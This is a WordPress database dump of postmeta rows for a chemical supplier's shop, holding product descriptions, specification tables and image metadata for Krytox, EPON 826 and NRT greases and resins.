INSERT INTO `wp_postmeta` VALUES (8399, 862, '_ywtm_content_tab_description', 'Krytox LVP high-vacuum grease performs over extremes of temperature and pressure that hydrocarbon, silicone, and chlorofluorocarbon greases can’t match. From –15–300°C (0–570°F), at vapor pressures as low as 10–13 mmHg, and in even the most chemically severe environments, Krytox LVP grease gives dependable, proven performance.\r\n\r\nAdditionally, Krytox LVP high-vacuum grease is nonflammable, insoluble, and chemically inert. It is also an excellent lubricant and sealant. And Krytox LVP grease offers all these features at a price that is less expensive than many hydrocarbon, silicone, and chlorofluorocarbon greases.\r\n\r\nKrytox LVP high-vacuum grease is used as a sealant or lubricant in vacuum systems. Chemically inert and offering superior lubrication properties, Krytox LVP grease combines the extremely low vapor pressure of Krytox fluorinated oil, which is based on the most stable type of perfluoroalkylpolyether available, with a fluorocarbon thickener. Thus, Krytox LVP grease will not explode, ignite, decompose, react to form gummy or solid deposits, or act as fuel for fires. Krytox grease retains its lubricating ability at temperature extremes ranging from –15–300°C (0–570°F) and offers complete oxidation resistance. All these features add up to lower wear and longer life for equipment and components—so important when access for component repair or replacement is difficult or impossible.'); 
INSERT INTO `wp_postmeta` VALUES (8400, 861, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (8401, 865, '_wp_attached_file', '2016/08/826.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8402, 861, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8403, 861, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8404, 861, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8405, 861, '716_default_editor', '<p class="Section1"><strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Fiber reinforced pipe and composites</li>\r\n 	<li>Tooling and molding compounds</li>\r\n 	<li>Construction, electrical and aerospace adhesives</li>\r\n 	<li>Electrical castings and laminates</li>\r\n 	<li>Chemical resistant high solids tank linings</li>\r\n 	<li>Flooring</li>\r\n 	<li>Grouting compounds</li>\r\n</ul>\r\n</div>'); 
INSERT INTO `wp_postmeta` VALUES (8406, 861, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8407, 861, '318_custom_list_file', 'a:2:{s:32:"eff358b2020c3add15231e63c530860b";a:3:{s:4:"name";s:8:"EPON 826";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/826.pdf";s:4:"desc";s:12:"EPON 826 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (8408, 861, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (8409, 861, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8410, 861, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8411, 861, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8412, 861, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8413, 861, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8414, 861, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8415, 861, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8416, 861, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8417, 861, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8418, 861, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8419, 861, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8420, 861, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8421, 861, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8422, 861, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8423, 861, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8424, 861, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8425, 861, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8426, 861, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8427, 861, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8428, 861, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8429, 861, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8430, 861, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8431, 861, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8432, 861, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8433, 861, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8434, 861, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8435, 861, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8436, 861, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8437, 861, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (8438, 788, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8439, 866, '_wp_attached_file', '2016/08/curing-agent-overview-new.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8440, 867, '_wp_attached_file', '2016/08/vazo_banner-e1472220482692.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8441, 867, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:575;s:6:"height";i:103;s:4:"file";s:38:"2016/08/vazo_banner-e1472220482692.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"vazo_banner-e1472220482692-340x103.jpg";s:5:"width";i:340;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"vazo_banner-e1472220482692-250x103.jpg";s:5:"width";i:250;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"vazo_banner-e1472220482692-200x103.jpg";s:5:"width";i:200;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"vazo_banner-e1472220482692-225x103.jpg";s:5:"width";i:225;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"vazo_banner-e1472220482692-510x103.jpg";s:5:"width";i:510;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8442, 867, '_edit_lock', '1472220490:1'); 
INSERT INTO `wp_postmeta` VALUES (8443, 867, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:575;s:6:"height";i:103;s:4:"file";s:15:"vazo_banner.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:23:"vazo_banner-340x103.jpg";s:5:"width";i:340;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"vazo_banner-180x103.jpg";s:5:"width";i:180;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"vazo_banner-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:23:"vazo_banner-400x103.jpg";s:5:"width";i:400;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (8444, 868, '_edit_lock', '1475607434:2'); 
INSERT INTO `wp_postmeta` VALUES (8445, 868, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8446, 869, '_wp_attached_file', '2016/08/NRT8908.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8447, 870, '_wp_attached_file', '2016/08/NRTgrease.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8448, 871, '_wp_attached_file', '2016/08/shutterstock_18414949.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8449, 871, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3072;s:6:"height";i:2304;s:4:"file";s:33:"2016/08/shutterstock_18414949.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_18414949-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_18414949-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_18414949-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_18414949-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_18414949-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_18414949-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_18414949-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_18414949-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8450, 872, '_wp_attached_file', '2016/08/shutterstock_60087109.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8451, 872, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4065;s:6:"height";i:2700;s:4:"file";s:33:"2016/08/shutterstock_60087109.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_60087109-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_60087109-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_60087109-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_60087109-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_60087109-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_60087109-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_60087109-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_60087109-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8452, 873, '_wp_attached_file', '2016/08/shutterstock_240925363.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8453, 873, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:4016;s:4:"file";s:34:"2016/08/shutterstock_240925363.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_240925363-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_240925363-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_240925363-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_240925363-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_240925363-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_240925363-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_240925363-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_240925363-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8454, 868, '_thumbnail_id', '872'); 
INSERT INTO `wp_postmeta` VALUES (8455, 874, '_wp_attached_file', '2016/08/shutterstock_274873175.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8456, 874, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5569;s:6:"height";i:3467;s:4:"file";s:34:"2016/08/shutterstock_274873175.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_274873175-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_274873175-800x498.jpg";s:5:"width";i:800;s:6:"height";i:498;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_274873175-768x478.jpg";s:5:"width";i:768;s:6:"height";i:478;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_274873175-1600x996.jpg";s:5:"width";i:1600;s:6:"height";i:996;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_274873175-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_274873175-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_274873175-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_274873175-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8457, 875, '_wp_attached_file', '2016/08/shutterstock_315050906.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8458, 875, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6050;s:6:"height";i:4038;s:4:"file";s:34:"2016/08/shutterstock_315050906.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_315050906-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_315050906-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_315050906-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_315050906-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_315050906-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_315050906-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_315050906-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_315050906-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8459, 876, '_wp_attached_file', '2016/08/shutterstock_414620641.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8460, 876, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5392;s:6:"height";i:3595;s:4:"file";s:34:"2016/08/shutterstock_414620641.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_414620641-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_414620641-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_414620641-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_414620641-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_414620641-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_414620641-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_414620641-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_414620641-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8461, 868, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8462, 868, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8463, 868, '312_default_editor', '<table width="1047">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>NRT 8900</strong></td>\r\n<td style="text-align: center;" width="241"><strong>NRT 8904</strong></td>\r\n<td style="text-align: center;" width="213"><strong>NRT 8906</strong></td>\r\n<td style="text-align: center;" width="167"><strong>NRT 8908</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Estimated Temperature Range</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>°C</strong></td>\r\n<td style="text-align: center;">-51-121</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-260</td>\r\n<td style="text-align: center;">-40-180</td>\r\n</tr>\r\n<tr>\r\n<td><strong>°F</strong></td>\r\n<td style="text-align: center;">-69-250</td>\r\n<td style="text-align: center;">-60-354</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-40-356</td>\r\n</tr>\r\n<tr>\r\n<td><strong>NLGI Grade</strong></td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Specific Gravity</strong></td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n</tr>\r\n<tr>\r\n<td><strong>ISO Viscosity</strong></td>\r\n<td style="text-align: center;">19</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">46</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8464, 868, '716_default_editor', '<ul>\r\n 	<li>Valves</li>\r\n 	<li>Regulators</li>\r\n 	<li>Pumps</li>\r\n 	<li>Bearings</li>\r\n 	<li>Motor Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Compressors</li>\r\n 	<li>Turbine Generators</li>\r\n 	<li>Automotive Components</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8465, 868, '719_default_editor', '<ul>\r\n 	<li>BAM</li>\r\n 	<li>BOC</li>\r\n 	<li>Air Liquide</li>\r\n 	<li>NASA</li>\r\n 	<li>General Dynamics</li>\r\n 	<li>Praxair</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D972</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8466, 868, '318_custom_list_file', 'a:1:{s:32:"b3d98ce2cb95a3204674aa4d78f511e0";a:3:{s:4:"name";s:7:"NRT SDS";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/NRTgrease.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8467, 868, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8468, 868, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8469, 868, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8470, 868, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8471, 868, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8472, 868, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8473, 868, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8474, 868, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8475, 868, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8476, 868, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8477, 868, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8478, 868, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8479, 868, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8480, 868, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8481, 868, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8482, 868, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8483, 868, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8484, 868, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8485, 868, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8486, 868, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8487, 868, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8488, 868, '_stock', ''); 
